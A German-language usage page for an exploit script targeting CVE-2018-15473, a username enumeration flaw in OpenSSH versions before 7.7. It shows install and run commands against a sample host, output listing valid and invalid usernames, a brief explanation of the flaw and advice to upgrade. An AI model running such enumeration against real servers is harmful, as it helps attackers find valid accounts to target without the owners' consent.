
OpenSSH 2.3 < 7.7 - Benutzernamen-Enumeration
SSH-Benutzernamen-Enumeration-Exploit (OpenSSH 2.3 < 7.7)
Bearbeitete Version des ursprünglichen Exploits: https://www.exploit-db.com/exploits/45233
#Stellen Sie sicher, dass Sie die Abhängigkeiten installieren:
foo@bar:~$ pip3 install -r requirements.txt
#Für einen einzelnen Benutzernamen:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root ist ein gültiger Benutzername
#Für mehrere Benutzernamen:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root ist ein gültiger Benutzername
[-] mysql ist ein ungültiger Benutzername
[-] mike ist ein ungültiger Benutzername
[-] foo ist ein ungültiger Benutzername
[-] bar ist ein ungültiger Benutzername
Gültige Benutzer:
root
#Für weitere Optionen:
foo@bar:~$ ./CVE-2018-15473.py -h
Das System reagiert unterschiedlich auf gültige und ungültige Authentifizierungsversuche. Ein entfernter Benutzer kann speziell gestaltete Anfragen senden, um gültige Benutzernamen auf dem Zielsystem zu ermitteln. Somit kann ein entfernter Benutzer gültige Benutzernamen auf dem Zielsystem ermitteln.
Der OpenSSH-Server sollte auf Version 7.7 oder höher aktualisiert werden.